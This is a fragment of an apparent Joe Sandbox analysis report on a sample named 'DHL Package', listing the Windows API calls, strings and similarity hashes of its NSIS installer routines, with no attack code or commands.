                                                                                                  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
                                                                                                • wsprintfA.USER32 ref: 004060A6
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040618F
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
                                                                                                  • Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                  • Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                • API String ID: 2171350718-461813615
                                                                                                • Opcode ID: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
                                                                                                • Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
                                                                                                • Opcode Fuzzy Hash: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
                                                                                                • Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404871
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040489B
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040494C
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404957
                                                                                                • lstrcmpiW.KERNEL32(004281C0,00423708,00000000,?,?), ref: 00404989
                                                                                                • lstrcatW.KERNEL32(?,004281C0), ref: 00404995
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7
                                                                                                  • Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                  • Part of subcall function 0040668A: CharNextW.USER32(?,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                  • Part of subcall function 0040668A: CharPrevW.USER32(?,?,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85
                                                                                                  • Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                  • Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
                                                                                                  • Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: A
                                                                                                • API String ID: 2624150263-3554254475
                                                                                                • Opcode ID: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
                                                                                                • Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
                                                                                                • Opcode Fuzzy Hash: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
                                                                                                • Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                  • Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                  • Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                Strings
                                                                                                • soft, xrefs: 00403103
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
                                                                                                • Error launching installer, xrefs: 00403065
                                                                                                • Null, xrefs: 0040310C
                                                                                                • Inst, xrefs: 004030FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 2803837635-527102705
                                                                                                • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                                                • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(004281C0,00000400), ref: 00406559
                                                                                                • GetWindowsDirectoryW.KERNEL32(004281C0,00000400,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040656C
                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040547A,?,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 004065A8
                                                                                                • SHGetPathFromIDListW.SHELL32(?,004281C0), ref: 004065B6
                                                                                                • CoTaskMemFree.OLE32(?), ref: 004065C1
                                                                                                • lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                                                • lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040663F
                                                                                                Strings
                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065E1
                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406529
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 717251189-730719616
                                                                                                • Opcode ID: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
                                                                                                • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                                                • Opcode Fuzzy Hash: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
                                                                                                • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                • lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                • lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
                                                                                                • SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID: &B
                                                                                                • API String ID: 2531174081-3208460036
                                                                                                • Opcode ID: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
                                                                                                • Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
                                                                                                • Opcode Fuzzy Hash: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
                                                                                                • Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043B5
                                                                                                • GetSysColor.USER32(00000000), ref: 004043F3
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004043FF
                                                                                                • SetBkMode.GDI32(?,?), ref: 0040440B
                                                                                                • GetSysColor.USER32(?), ref: 0040441E
                                                                                                • SetBkColor.GDI32(?,?), ref: 0040442E
                                                                                                • DeleteObject.GDI32(?), ref: 00404448
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                  • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                • String ID: 9
                                                                                                • API String ID: 163830602-2366072709
                                                                                                • Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                • Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
                                                                                                • Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                • Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
                                                                                                • GetMessagePos.USER32 ref: 00404D0F
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D29
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                • Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                • Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402F74
                                                                                                • wsprintfW.USER32 ref: 00402F84
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                                                • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                                                • wsprintfW.USER32 ref: 004067B2
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                • API String ID: 2200240437-1946221925
                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                • Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                • Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2667972263-0
                                                                                                • Opcode ID: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
                                                                                                • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                                                • Opcode Fuzzy Hash: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
                                                                                                • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$wsprintf
                                                                                                • String ID: ... %d%%
                                                                                                • API String ID: 551687249-2449383134
                                                                                                • Opcode ID: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
                                                                                                • Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
                                                                                                • Opcode Fuzzy Hash: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
                                                                                                • Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                • CharNextW.USER32(?,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                • CharPrevW.USER32(?,?,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: *?|<>/":
                                                                                                • API String ID: 589700163-165019052
                                                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                • Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
                                                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                • Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017D5
                                                                                                  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                  • Part of subcall function 00405443: lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
                                                                                                  • Part of subcall function 00405443: SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
